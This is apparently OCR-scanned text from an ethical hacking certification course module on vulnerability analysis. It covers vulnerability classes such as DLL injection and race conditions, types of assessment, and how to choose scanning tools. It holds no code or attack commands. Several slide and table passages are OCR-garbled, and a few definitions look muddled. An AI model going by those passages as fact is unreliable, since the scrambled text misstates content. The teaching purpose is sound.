Null Pointer/Object Dereference Also known as a null reference, a null pointer is a value stored to represent that the pointer is not designated to any valid object; it also indicates invalid memory location. The majority of null-pointer issues lead to common software reliability issues, but once an attacker deliberately triggers a null-pointer dereference, they might be able to use the resulting exception to evade the security logic and make the application disclose debugging details that can help in devising strategies for subsequent attacks. Programs generally utilize these null pointers to indicate a condition such as the last point of unspecified length and incompetence to perform some operations; this type of nullpointer usage is comparable to the nullable types and no value in the option type. A null-pointer dereference can prevent a program from execution or crash the program and cause it to exit.
=
DLL Injection
When an application runs third-party code or untrusted code that loads an assembly or DLL file, an attacker may exploit this vulnerability to inject a malicious DLL into the current running process and execute malicious code. Furthermore, loading DLL files without specifying the complete path of the file location may allow attackers to create a malicious DLL and place it in a location that precedes the path of the legitimate DLL file. Consequently, the application executes the malicious DLL. To prevent such vulnerabilities, programmers must never load untrusted DLLs from user input and must always invoke DLLs by specifying the full path of the file location. =
Race Conditions A race condition is an undesirable incident that occurs when a software or system program depends on the execution of processes in a sequence and on the timing of the programs. This condition occurs when a system that handles events in a sequential format is coerced to perform multiple operations simultaneously. The condition results in the improper execution of a program or software bugs. A typical race condition occurs when multiple threads depend on a shared resource. Most race conditions impact the security associated with the system. An attacker can perform DoS or privilege escalation attacks by accessing the shared resource of a trusted process.
o
Time of Check/Time of Use The time of check or time of use (TOC/TOU) is a software error that occurs because of the race condition that occurs after checking the state of particular segment of the system at a specific time and before the time of using the checking results. In simple terms, it is defined as the change in system state from the time of checking for a prediction to the time of acting on the prediction. It is a timing vulnerability
that occurs when the system grants access permission to a resource request. For
example, when a user wishes to transfer an amount from one account to another, a
Module 05 Page 547
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
risk of an attack exists in the middle of the transaction between
the TOC and TOU,
i.e., from the time of checking whether the required amount is available to the time of transferring that amount. =
Improper Input Handling Input handling is defined as the verification of application functionalities such as validation, filtering, sanitizing, encryption, and decryption of input data. Failure in verifying the input data results in vulnerabilities. Input validation is mandatory to ensure the integrity of incoming data by checking and comparing the data with the type of expected data. Data originating from both trusted and untrusted sources have the risk of being corrupted by attackers using techniques such as SQL injection, cross-site scripting, and buffer overflow. Implementing both client-side and server-side validation ensures effective data authentication.
=
Improper Error Handling Improper error handling occurs when an attacker exploits the security system by utilizing error information. Most web applications or servers disclose detailed information about errors such as database dumps and stack traces. They can also generate detailed errors that include information about the system condition such as system call failure, timeouts, exceptions, and data availability, which can help an attacker analyze and attack the system. Fail-open is one of the security issues caused by improper error handling. Fail-open is defined as the granting of access after a system has failed or denied access.
Poor Patch Management A patch is a small piece of software designed to fix problems, security vulnerabilities, and bugs as well as improve the usability or performance of a computer program or its supporting data. Software vendors provide patches that prevent exploitations and reduce the probability of threats exploiting a specific vulnerability. Unpatched software can make an application, server, or device vulnerable to various attacks. The following are some examples of poor patch
management. =
Unpatched Servers
Servers are an essential component of the infrastructure of any organization. There have been several cases where organizations ran unpatched and misconfigured servers that compromised the security and integrity of the data in their system. Hackers search for these vulnerabilities in servers and exploit them. These unpatched servers serve as a hub for attackers or an entry point into the network. This can lead to the exposure of private data, financial loss, and discontinuation of operations. Updating software regularly and maintaining systems properly by patching and fixing bugs can help in mitigating the vulnerabilities caused by unpatched servers. =
Unpatched Firmware
Unpatched firmware may lead to vulnerabilities through which an attacker can easily enter a corporate network and steal critical information or damage critical resources. Module 05 Page 548
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Firmware vulnerabilities allow attackers to inject malicious code, infect legitimate updates, delete data stored on the hard drive, or even control the system hardware from a remote location in some cases. To mitigate such vulnerabilities, security professionals must regularly check and update the firmware.
=
Unpatched OS Attackers use systems having unpatched OSes as the origin of an infection vector to infect other systems or devices connected to the same network. Attackers scan for systems having unpatched OSes and use those systems for spreading malware to other systems connected to the network. If an attacker identifies a vulnerability in an OS kernel file or shared library, they can exploit this vulnerability in an attempt to perform privilege escalation using malware that gains system- or root-level access. Security professionals must enable the auto-update feature to update OSes automatically and regularly.
=
Unpatched Applications Unpatched application vulnerabilities allow attackers to inject and run malicious code by exploiting a known software bug. Generally, no software or applications are flawless. Software vendors frequently release patches to resolve identified vulnerabilities. Unpatched applications pave the way for attackers to exploit and compromise the security of systems and software. Therefore, it is important for organizations to apply vulnerability patches and upgrade applications on a regular basis.
Design Flaws Vulnerabilities due to design flaws are universal to all operating devices and systems. Design vulnerabilities such as incorrect encryption or the poor validation of data refer to logical flaws in the functionality of the system that attackers exploit to bypass the detection mechanism and
acquire access to a secure system.
Third-Party Risks A third party can become another potential threat to enterprises. Third-party services or products can have access to privileged systems and applications, through which financial information, customer and employee data, and processes in the enterprise’s supply chain can be compromised. The third party may be trustworthy, but enterprises usually do not check if they maintain appropriate standards and security measures; eventually, they can become a threat for the enterprise network. Major third-party risks include identity theft, intellectual property theft, data breaches, implantation of file-less malware, and network intrusions. An organization should be aware of third-party risks and run real-time, continuous risk management processes within the environment. The following are different types of risks associated with third-party dependency. =
Vendor management: It is the activity of selecting suppliers and assessing the risks of third-party services and products. It includes all the essential programs and processes required for an organization to handle and manage operations and communications with its third-party vendors. Organizations often depend on third-party vendors to save
Module 05 Page 549
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
expenses, fend off market rivalry, increase productivity, and gain higher profits with lower effort. However, if the third-party vendor is not trusted or fails to follow the required standards, it can pose risks to the organization’s data or information. The organization may need to face all the consequences in case of a breach. The best approach to discover risks associated with the third party include employing best vendor management practices alongside enforcing third-party vendor risk management
systems. o
System integration: It is a process of employing third-party services or hiring thirdparty vendors to run business operations. When a third party hosts the services or performs software development for the company, the system integrators need full access to the systems/application. As the integrators work from inside the company, they can easily evade firewalls and security solutions and install malware or spyware in the network. The integrators can also employ port scanning techniques to obtain data packets directly from the network. Organizations need to oversee the operations of third-party vendors and the progress of projects.
o
Lack of vendor support: Organizations often depend on third-party vendors to manage the security of systems inside a network. In such cases, the vendors are entrusted with discovering and fixing issues before they get exploited, and they become members within the working environment of the organization. As they deal with complex network infrastructure, insufficient knowledge in handling security systems or identifying risks can open avenues for new cyber-attacks. Vendors should be adept in finding issues and should be encouraged to maintain a high quality of work and keep systems secure and updated.
=
Supply-chain risks: The majority of network devices and systems in an organization are often purchased from a third party. The use of such equipment in each segment along the supply chain can potentially pose security risks due to improper maintenance or configuration. Proper security controls must be implemented for the equipment/devices or software that organizations purchase or borrow from a third party. For instance, the software or hardware purchased from a third party may not be properly sanitized. In such cases, malware concealed inside the previously provisioned equipment can infect the new systems deployed in the organization and spread to all other devices connected to the network.
=
Outsourced code development: In some cases, enterprises do not have all the resources required for developing products inside their environment. In such cases, organizations hire contract-based third parties to develop products or software. In such cases, organizations should establish a secure environment for the third-party designers to develop and assess the code being built. Organizations should also determine where the code needs to be stored and place appropriate security controls to the storage space because the code can be stolen to develop similar projects. After the coding process is completed, the product requires thorough testing, and developers should ensure that unauthorized access to the application resources is prevented. It is also important to ensure that resources being accessed by the application are stored in a
Module 05 Page 550
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
protected environment and that data are encrypted before being transmitted over the network. =
Data storage: With the emergence of cloud technology, organizations are storing large amounts of data in third-party storage spaces, where vendors may also have access to organizations’ data. Therefore, the data should be frequently inspected for security
concerns to protect sensitive information related to customers, employees, or users. Organizations should insist that appropriate security controls be implemented and integrity be maintained for the data stored in the third-party storage. Data transmission should be performed with encryption and through a secure channel. =
Cloud-based vs. on-premises risks: As organizations are migrating their business infrastructure to cloud environments, storage and data exposure issues often arise in third-party storage locations. On the other hand, businesses running in an on-premises environment may also have issues such as weak security configurations, application or software vulnerabilities, and vendor issues that can emerge from network devices such as firewalls, switches, and routers, which are placed within the organization’s infrastructure. Proper configuration and encryption are the main solutions for both environments. In the context of cloud security, the cloud provider has the sole responsibility of securing the cloud; however, the client should also be aware of the best practices to use cloud services in a secure manner.
Default Installations/Default Configurations Default installations are usually user-friendly — especially when the device is being used for the first time when the primary concern is the usability of the device rather than the device’s security. In some cases, infected devices may not contain any valuable information, but are connected to networks or systems that have confidential information that would result in a data breach. Failing to change the default settings while deploying the software or hardware allows the attacker to guess the settings to break into the system. Systems or devices with default configurations, if connected to the production or corporate network, enable attackers to perform advanced persistent attacks. These systems allow attackers to gain information about the target OS and other vulnerabilities existing in the target network. Based on the identified vulnerabilities, attackers may perform further attacks. When connecting a system or device to a network, it is important to disable unnecessary components and services associated with the default configuration. Operating System Flaws Due to vulnerabilities in the operating systems, applications such as Trojans, worms, and viruses pose threats. These attacks use malicious code, script, or unwanted software, which results in the loss of sensitive information and control of computer operations. Timely patching of the OS, installing minimal software applications, and using applications with firewall capabilities are essential steps that an administrator must take to protect the OS from attacks.
Module 05 Page 551
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Default Passwords Manufacturers provide users with default passwords to access the device during its initial setup, which users must change for future use. When users forget to update the passwords and continue using the default passwords, they make devices and systems vulnerable to various attacks, such as brute force and dictionary attacks. Attackers exploit this vulnerability to obtain access to the system. Passwords should be kept confidential; failing to protect the confidentiality of a password allows the system to be easily compromised. Zero-Day Vulnerabilities Zero-day vulnerabilities are unknown vulnerabilities in software/hardware that are exposed but not yet patched. These Vulnerabilities are exploited by the attackers before being acknowledged and patched by the software developers or security analysts. Zero-day vulnerabilities are one of the major cyber-threats that continuously expose the vulnerable systems until they get patched. Legacy Platform Vulnerabilities
Legacy platform vulnerabilities are caused by obsolete or familiar codes. Legacy platforms are usually not supported when patching technical assets such as smartphones, computers, loT devices, OSes, applications, databases, firewalls, intrusion detection systems (IDSs), or other network components. This type of vulnerabilities could cause costly data breaches for organizations. Legacy systems can be secured using other security controls, rather than by fixing them. Another possible solution is to segregate these systems from the network so that attackers cannot gain physical access to them. System Sprawl/Undocumented Assets
The system sprawl vulnerability arises within an organization network because of an increased number of system or server connections without proper documentation or the understanding of their maintenance. These assets are often neglected over time, making them susceptible to attacks. It could also lead to expensive maintenance because each vulnerable asset will be included in the maintenance cost each time effective maintenance is required or the latest hardware or software upgrades need to be scheduled. Additionally, undocumented assets do not support multiplexed database backups or quick multi-streaming, thereby forcing IT teams to choose between fast backups and capacity optimization. Improper Certificate and Key Management Improper certificate and key management may lead to many vulnerabilities that allow attackers to perform password cracking and data exfiltration attacks. Keys stored on servers are vulnerable to attacks. Security professionals need to ensure that keys are stored in an encrypted format and are decrypted only in a protected secure environment. Storing or retaining legacy or outdated keys also poses major threats to organizations. Private keys used with certificates must be stored in a highly secured environment; otherwise, an unauthorized individual can intercept the keys and gain access to confidential data or critical systems.
Module 05 Page 552
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Types of Vulnerability Assessment Assessment Type Active Assessment Passive Assessment
Description © USS network scanner tofind hosts, services, and vulnerabilities © Used to sniff the network traffic to discover present
active systems, network services, applications, and wuinerabilities present © Assesses the network from a hacker's perspective to External Assessment discover exploits and vulnerabilities that areaccessible | to the outside world the internal infrastructure to discover exploits Internal Assessment © Scans and vulnerabilities O @aenbocniG a SSC eeaey system configurations, user directories, file systems,
Host-based
CE H
Assessment Type Perea Assessment
Description © Focuseson testing databases, such as MYSQL, MSSQL, ORACLE, POSTGRESQL, etc., for the presence of data cs
Wireless Network Assessment pees gsc vane Credentialed Assessment
© Determines the vulnerabilities in the organization's wireless networks © Assesses the distributed organization assets, such as client and server applications, simultaneously through appropriate synchronization techniques © Assesses the network by obtaining the credentials of all ‘ present in the network machines
Non-Credentialed
© Assesses the network without acquiring any credentials
ETI
EES
Assessment ofthe assets present in the enterprise network registry settings, etc.,to evaluate the possibilty of Gouauliied © inthis type of assessment, the ethical hacker manually © Determines possible network security attacksthat may | | Manual Assessment assesses the vulnerabilities, vulnerability ranking, occur on the organization's system vulnerability score, etc. © Tests and analyzestes all elements of the web © Inthis type type of assessment, the ethical hacker emploets ‘Automated infrastructure for any misconfiguration, outdated various vulnerability assessment tools, such as Nessus, Assessment content,or known vulnerabilities Qualys, GF LanGuard, etc.
Assessment Network-based ‘Assessment ‘Application
Assessment
Types of Vulnerability Assessment Given below are the different types of vulnerability assessments: Active Assessment
A type of vulnerability assessment that uses network scanners to identify the hosts, services, and vulnerabilities present in a network. Active network scanners can reduce the intrusiveness of the checks they perform. Passive Assessment
Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network. External Assessment External assessment examines the network from a hacker’s point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers. An external assessment estimates the threat of network security attacks from outside the organization. It determines the level of security of the external network and firewall. The following are some of the possible steps in performing an external assessment: o
Determine a set of rules for firewall and router configurations for the external network
o
Check whether the external server devices and network devices are mapped
o
Identify open ports and related services on the external network
Module 05 Page 553
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Vulnerability Analysis
=
o
Examine the patch levels on the server and external network devices
o
Review detection systems such as IDS, firewalls, and application-layer protection
systems
©
Get information on DNS zones
©
Scan the external network through a variety of proprietary tools available on the
o
Examine Web applications such as e-commerce and shopping cart software for vulnerabilities
Internet
Internal
Assessment
An internal assessment involves scrutinizing the internal network to find exploits and vulnerabilities. The following are some of the possible steps in performing an internal
assessment:
=
co
Specify the open ports and related services on network devices, servers, and
o
Check the router configurations and firewall rule sets
o
List the internal vulnerabilities of the operating system and server
©
Scan for any trojans that may be present in the internal environment
o
Check the patch levels on the organization’s internal network devices, servers, and
o
Check for the existence of malware, spyware, and virus activity and document them
o
Evaluate the physical security
o
Identify and review the remote management process and events
©.
Assess the file-sharing mechanisms (for example, NFS and SMB/CIFS shares)
o
Examine the antivirus implementation and events
systems
systems
Host-based Assessment Host-based assessments are a type of security check that involve conducting a configuration-level check to identify system configurations, user directories, file systems, registry settings, and other parameters to evaluate the possibility of compromise. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. Host-based assessments use many commercial and open-source scanning tools.
=
Network-based Assessment Network assessments determine the possible network security attacks that may occur on an organization’s system. These assessments discover network resources and map the ports and services running to various areas on the network. It evaluates the
Module 05 Page 554
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
organization’s system for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Network assessment professionals use firewalls and network scanners, such as Nessus. These scanners identify open ports, recognize the services running on those ports, and detect vulnerabilities associated with these services. These assessments help organizations identify points of entry and attack into a network since they follow the path and approach of the hacker. They help organizations determine how systems are vulnerable to Internet and intranet attacks, and how an attacker can gain access to important information. A typical network assessment conducts the following tests on a network:
=
o
Checks the network topologies for inappropriate firewall configuration
o
Examines the router filtering rules
o
Identifies inappropriately configured database servers
o.
Tests individual services and protocols such as HTTP, SNMP, and FTP
o
Reviews HTML source code for unnecessary information
o
Performs bounds checking on variables
Application Assessment
An application assessment focuses on transactional Web applications, server applications, and hybrid systems. It analyzes all elements infrastructure, including deployment and communication within the This type of assessment tests the webserver infrastructure for any outdated content, or known vulnerabilities. Security professionals use and open-source tools to perform such assessments. =
Database
traditional clientof an application client and server. misconfiguration, both commercial
Assessment
A database assessment is any assessment focused on testing the databases for the presence of any misconfiguration or known vulnerabilities. These assessments mainly concentrate on testing various database technologies like MYSQL, MSSQL, ORACLE, and POSTGRESQL to identify data exposure or injection type vulnerabilities. Security professionals use both commercial and open-source tools to perform such assessments. =
Wireless Network Assessment Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization’s perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.
Module 05 Page 555
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis =
Exam 312-50 Certified Ethical Hacker
Distributed Assessment This type of assessment, employed by organizations that possess assets like servers and clients at different locations, involves simultaneously assessing the distributed organization assets, such as client and server applications, using appropriate synchronization techniques. Synchronization plays a critical role in this type of assessment. By synchronizing the test runs together, all the separate assets situated at multiple locations can be tested at the same time.
=
Credentialed Assessment Credentialed assessment is also called authenticated assessment. In this type of assessment, the ethical hacker possesses the credentials of all machines present in the assessed network. The chances of finding vulnerabilities related to operating systems and applications are higher in credential assessment than in non-credential assessment. This type of assessment is challenging since it is highly unclear who owns particular assets in large enterprises, and even when the ethical hacker identifies the actual owners of the assets, accessing the credentials of these assets is highly tricky since the asset owners generally do not share such confidential information. Also, even if the ethical hacker successfully acquires all required credentials, maintaining the password list is a huge task since there can be issues with things like changed passwords, typing errors, and administrative privileges. Although it is the best way of assessing a target enterprise network for vulnerabilities and is highly reliable, it is a complex assessment that is challenging.
=
Non-Credentialed Assessment Non-credentialed assessment, also called unauthenticated assessment, provides a quick overview of weaknesses by analyzing the network services that are exposed by the host. Since it is a non-credential assessment, an ethical hacker does not require any credentials for the assets to perform their assessments. This type of assessment generates a brief report regarding vulnerabilities; however, it is not reliable because it does not provide deeper insight into the OS and application vulnerabilities that are not exposed by the host to the network. This assessment is also incapable of detecting the vulnerabilities that are potentially covered by firewalls. It is prone to false-positive outputs and is not reliably effective as compared to credential-based assessment.
=
Manual Assessment After performing footprinting and network scanning and obtaining crucial information, if the ethical hacker performs manual research for exploring the vulnerabilities or weaknesses, they manually rank the vulnerabilities and score them by referring to vulnerability scoring standards like CVSS and vulnerability databases like CVE and CWE. Such assessment is considered to be manual.
=
Automated Assessment An assessment where an ethical hacker uses vulnerability assessment tools such as Nessus Professional, Qualys, or GFl LanGuard to perform a vulnerability assessment of
Module 05 Page 556
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
the target is called an automated assessment. Unlike manual assessments, in this type of assessment, the ethical hacker does not perform footprinting and network scanning. They employ automated tools that can perform all such activities and are also capable of identifying weaknesses and CVSS scores, acquiring critical CVE/CWE information related to the vulnerability, and suggesting remediation strategies. =
Cloud-based Assessment This type of assessment focuses on evaluating overall security of the cloud infrastructure according to the cloud service provider's best practices or guidelines. This assessment involves identifying cloud infrastructure vulnerabilities and mitigating them through access control mechanisms and proper security measures complying with the standards. This type of assessment is frequently performed to identify the risks associated with the assets deployed over the cloud. It also assists security professionals to detect weak entry points on the cloud, through which the attackers can make their way into the organization’s network.
=
Mobile Application Assessment Mobile application assessment aims at protecting the privacy of data across mobile applications and APIs. It is a must-have security practice for every organization that hosts publicly accessible applications. This type of assessment involves examining source code and internal security controls of mobile applications. Security professionals need to perform this type of assessment to evaluate and improve the overall application's strength against known and future threats to protect sensitive data. An effective assessment can minimize risks and assists in incorporating appropriate security controls to increase the safety of mobile applications.
Module 05 Page 557
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
C'EH
LO#03: Use Vulnerability Assessment Tools
Copyright © by
Al RightsReserved
Strictly Prohibited
Vulnerability Assessment Tools Vulnerability assessment they identify all potential different approaches and appropriate assessment organization faces.
solutions are important tools for security weaknesses before an solutions available to perform a approach plays a major role
This section outlines the vulnerability assessment.
various
approaches,
information security management attacker can exploit them. There vulnerability assessment. Selecting in mitigating the threats that
solutions,
and
tools
used
to
perform
as are an an a
Comparing Approaches to Vulnerability Assessment There are four types of vulnerability assessment solutions: product-based based solutions, tree-based assessment, and inference-based assessment.
=
solutions,
service-
Product-Based Solutions Product-based solutions are installed in the organization’s internal network. They are installed either on a private or non-routable space or in the Internet-addressable portion of an organization’s network. If they are installed on a private network (behind the firewall), they cannot always detect outside attacks.
=
Service-Based Solutions Service-based solutions are offered by third parties, such as auditing or security consulting firms. Some solutions are hosted inside the network, while others are hosted outside the network. A drawback of this solution is that attackers can audit the network from the outside.
Module 05 Page 558
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis =
Tree-Based
Exam 312-50 Certified Ethical Hacker
Assessment
In a tree-based assessment, the auditor selects different strategies for each machine or component of the information system. For example, the administrator selects a scanner for servers running Windows, databases, and web services but uses a different scanner for Linux servers. This approach relies on the administrator to provide a starting piece of intelligence, and then to start scanning continuously without incorporating any information found at the time of scanning. =
Inference-Based Assessment In an inference-based assessment, scanning starts by building an inventory of the protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services, such as an email server, web server, or database server. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.
Characteristics of a Good Vulnerability Assessment Solution Organizations need to select a proper and suitable vulnerability assessment solution to detect, assess, and protect their critical IT assets from various internal and external threats. The characteristics of a good vulnerability assessment solution are as follows: =
Ensures correct outcomes by testing the network, network resources, ports, protocols,
and operating systems
=
Uses a well-organized inference-based approach for testing
=
Automatically scans and checks against continuously updated databases
=
Creates brief, actionable, customizable severity level, and trend analysis
=
Supports multiple networks
=
Suggests appropriate remedies and workarounds to correct vulnerabilities
=
Imitates the outside view of attackers to gain its objective
reports, including reports of vulnerabilities by
Working of Vulnerability Scanning Solutions Any organization needs to handle and process large volumes of data to conduct business. These large volumes of data contain privileged information of that particular organization. Attackers try to identify vulnerabilities that they can exploit, and then use these to gain access to critical data for illegal purposes. Vulnerability analysis analyzes and detects risk-prone areas in the organizational network. This analysis uses various tools and reports on the vulnerabilities present in the network. Vulnerability scanning solutions perform vulnerability penetration tests on the organizational network in three steps: =
Locating nodes: The first step in vulnerability scanning target network using various scanning techniques.
Module 05 Page 559
is to locate live hosts in the
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
=
Performing service and OS discovery on them: After detecting the live hosts in the target network, the next step is to enumerate the open ports and services along with the operating system on the target systems.
=
Testing those services and OS for known vulnerabilities: Finally, after identifying the open services and the operating system running on the target nodes, they are tested for known vulnerabilities. Term of References
Locate Nodes
ee
.
>
Perform
Service and
OS Discovery on them
rrres |
>
Test Services
and OS for Known
Vulnerabilities
Findings and Recommendations
Figure 5.6: The working of vulnerability scanning solutions
Types of Vulnerability Assessment Tools There are six types of vulnerability assessment tools: host-based vulnerability assessment tools, application-layer vulnerability assessment tools, depth assessment tools, scope assessment tools, active and passive tools, and location and data-examination tools. =
Host-Based Vulnerability Assessment Tools The host-based scanning tools are appropriate for servers that run various applications, such as the Web, critical files, databases, directories, and remote accesses. These hostbased scanners can detect high levels of vulnerabilities and provide required information about the fixes (patches). A host-based vulnerability assessment tool identifies the OS running on a particular host computer and tests it for known deficiencies. It also searches for common applications and services.
=
Depth Assessment Tools Depth assessment tools are used to discover and identify previously unknown vulnerabilities in a system. Generally, tools such as fuzzers, which provide arbitrary input to a system’s interface, are used to identify vulnerabilities to an unstable depth. Many of these tools use a set of vulnerability signatures to test whether a product is resistant to a known vulnerability or not.
Module 05 Page 560
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis =
Exam 312-50 Certified Ethical Hacker
Application-Layer Vulnerability Assessment Tools Application-layer vulnerability assessment tools are designed to serve the needs of all kinds of operating system types and applications. Various resources pose a variety of security threats and are identified by the tools designed for that purpose. Observing system vulnerabilities through the Internet using an external router, firewall, or webserver is called an external vulnerability assessment. These vulnerabilities could be external DoS/DDoS threats, network data interception, or other issues. The analyst performs a vulnerability assessment and notes vulnerable resources. The network vulnerability information is updated regularly into the tools. Application-layer vulnerability assessment tools are directed towards web servers or databases.
=
Scope Assessment Tools
Scope assessment tools provide an assessment of the security by testing vulnerabilities in the applications and operating system. These tools provide standard controls and a reporting interface that allows the user to select a suitable scan. These tools generate a standard report based on the information found. Some assessment tools are designed to test a specific application or application type for vulnerability. =
Active and Passive Tools Active scanners perform vulnerability checks on the network functions that consume resources on the network. The main advantage of the active scanner is that the system administrator or IT manager has good control of the timing and the parameters of vulnerability scans. This scanner cannot be used for critical operating systems because it uses system resources that affect the processing of other tasks. Passive scanners are those that do not considerably affect system resources, as they only observe system data and perform data processing on a separate analysis machine. A passive scanner first receives system data that provide complete information on the processes that are running and then assesses that data against a set of rules.
=
Location and Data Examination Tools Listed below are some of the location and data examination tools: o
Network-Based Scanner: Network-based scanners are those that interact only with the real machine where they reside and give the report to the same machine after scanning.
o
Agent-Based Scanner: Agent-based scanners scan several machines on the same network.
©
Proxy Scanner: Proxy scanners are the network-based networks from any machine on the network.
o
Cluster scanner: Cluster scanners are similar to proxy scanners, but they can simultaneously perform two or more scans on different machines in the network.
Module 05 Page 561
reside on a single machine scanners
that
but can can
scan
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Choosing a Vulnerability Assessment Tool Vendor-designed vulnerability assessment tools can be used to test a host or application for vulnerabilities. There are several available vulnerability assessment tools that include port scanners, vulnerability scanners, and OS vulnerability assessment scanners. Organizations must choose appropriate tools based on their test requirements. Choose the tools that best satisfy the following requirements: Tools must be capable of testing anywhere from dozens to 30,000 different vulnerabilities, depending on the product The selected tool should have a sound database of vulnerabilities and frequently updated attack signatures Pick a tool that matches the environment and expertise
Make sure to regularly update the scan engine to ensure the tool is aware of the latest known vulnerabilities Verify that the chosen vulnerability assessment tool has accurate network mapping, application mapping, and penetration tests. Not all tools can find the protocols running and analyze a network’s performance. Ensure that the tool has several regularly updated vulnerability scripts for the platforms you are scanning Make sure that any patches are applied; failing to do so might lead to false positives Find out how many reports are returned, what information they contain, and whether they are exportable Check whether the tool has different levels of penetration to stop lockups The maintenance costs of tools can be offset by effectively using them Ensure that the vulnerability assessment tool can run its scans quickly and accurately Ensure that the tool can perform scans using multiple protocols Verify that the tool can understand and analyze the network topology to perform the
assessment
Bandwidth limitations are a major concern when dealing with large networks. Ensure the vulnerability assessment tool has high bandwidth allocation Ensure that the vulnerability assessment tool possess excellent query throttling features Ensure that the tool can also assess fragile systems and non-traditional assets
Module 05 Page 562
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Criteria for Choosing a Vulnerability Assessment Tool The criteria to follow when follows:
choosing or purchasing any vulnerability assessment tool are as
=
Types of vulnerabilities being assessed: The most important information at the time of evaluating any tool is to find out how many types of vulnerabilities it will discover.
=
Testing capability of scanning: The vulnerability assessment tool must have the capacity to execute the entire selected test and must scan all the systems selected for scanning.
=
Ability to provide accurate reports: The ability to prepare an accurate report is essential. Vulnerability reports should be short, clear, and should provide an easy method to mitigate the discovered vulnerability.
=
Efficient and accurate scanning: Two essential aspects of scanner performance are how much time it takes for a single host and what resources are required, and the loss of services at the time of scanning. It is important to ensure accuracy and to be aware of the accuracy of the results.
=
Capability to perform a smart search: How clever they are at the time of scanning is also a key factor in judging any vulnerability assessment tool.
=
Functionality for writing its own tests: When a signature is not present for a recently found vulnerability, it is helpful if the vulnerability scanning tool allows the use of userdeveloped tests.
=
Test run scheduling: It is important to be able to do test-run scheduling as it allows users to perform scanning when traffic on the network is light.
Best Practices for Selecting Vulnerability Assessment Tools Some of the best practices that can be adopted for selecting vulnerability assessment tools are: =
Vulnerability assessment tools are used to secure and protect the organization’s system or network. Ensure that they do not damage the network or system while running.
=
Before using any vulnerability assessment tools, it is important to understand their function and to decide what information is needed before starting
=
Security mechanisms for accessing from within and from outside the network are somewhat different, so decide the location for the scan based on the desired information
=
At the time of scanning, enable logging and ensure that all outcomes and methodologies are annotated every time a scan is performed on any computer
=
Users should frequently scan their systems for vulnerabilities and regularly monitor them for vulnerabilities and exploits
Module 05 Page 563
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Vulnerability Analysis
Exam 312-50 Certified Ethical Hacker
Vulnerability Assessment Tools: Qualys Vulnerability Management
@ Acloud-based service that | | © overs offe
immediate
global
visibility into IT system
elorisdys
Internet threats and how
Results
to protect them
December 25
a
areas that might be
vulnerable to the latest ‘@
Vulnerability Scorecard Report
€ | EH
~~)
\VulncaityDietibtion by Sevety Level
Veter Dattoten by Tne
Aids in the continuous
identification of threats
and monitoring of unexpected changes ina network before they become breaches
1O) Qualys.
